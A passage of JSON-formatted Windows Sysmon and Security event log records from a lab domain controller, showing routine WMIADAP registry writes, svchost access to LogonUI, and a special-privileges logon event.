RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Data","Details":"Binary Data","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4106,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteKey\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4107,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\kernelbase.dll[MofResourceName]\r\nDetails: LowDateTime:1098060289,HighDateTime:30805949***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\kernelbase.dll[MofResourceName]","Details":"LowDateTime:1098060289,HighDateTime:30805949***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4108,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\en-US\\kernelbase.dll.mui[MofResourceName]\r\nDetails: LowDateTime:625866771,HighDateTime:30682635***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\en-US\\kernelbase.dll.mui[MofResourceName]","Details":"LowDateTime:625866771,HighDateTime:30682635***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4109,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\ACPI.sys[ACPIMOFResource]\r\nDetails: LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\ACPI.sys[ACPIMOFResource]","Details":"LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4110,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]\r\nDetails: LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]","Details":"LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4111,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\mssmbios.sys[MofResource]\r\nDetails: LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\mssmbios.sys[MofResource]","Details":"LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4112,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]\r\nDetails: LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]","Details":"LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4113,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\intelppm.sys[PROCESSORWMI]\r\nDetails: LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\intelppm.sys[PROCESSORWMI]","Details":"LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4114,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\intelppm.sys.mui[PROCESSORWMI]\r\nDetails: LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\intelppm.sys.mui[PROCESSORWMI]","Details":"LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4115,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\xeniface.sys[XENIFACEMOF]\r\nDetails: LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\xeniface.sys[XENIFACEMOF]","Details":"LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4116,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refresh\r\nDetails: DWORD (0x00000000)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refresh","Details":"DWORD (0x00000000)","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4117,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:21.699\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed\r\nDetails: DWORD (0x00000001)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:21.699","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed","Details":"DWORD (0x00000001)","EventReceivedTime":"2020-08-01 07:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4118,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:26.997\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 488\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+b954|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:26.997","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"488","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+b954|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4119,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:26.997\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 488\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+ba7a|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:26.997","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"488","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+ba7a|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220410,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x628BA\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x628ba","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:57:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
